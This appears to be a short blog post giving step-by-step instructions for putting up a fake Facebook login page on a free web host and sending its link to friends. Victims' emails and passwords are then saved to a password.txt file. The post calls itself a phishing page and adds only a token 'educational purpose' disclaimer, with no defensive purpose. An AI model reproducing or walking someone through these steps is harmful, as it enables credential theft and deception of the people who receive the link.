

>> Create an Account and Upload These 3 Files in it.

>> Here I am using my3gb. [Note That after registration on any web hosting site you have to confirm your email id, Open your Email and confirm it, After That you can use your web hosting site, If you are not getting any confirmation mail then check in your Spam] After Upload 3 File you have to open Facebook.html and you will see Login page of facebook, But it's not Official Site of facebook, it is our fake page [phishing page].

>> That it..!! Now You can give the link of facebook.html and give to your friend or you can also test it.

>> When you Friend Enter his/her Email Id and Password then it'll store in password.txt [In account of Web Hosting Site]

Note : Remember this is only for eductional purpose. we are not responsible for it. dont miss use.

Posted By Bergin A9:02 PM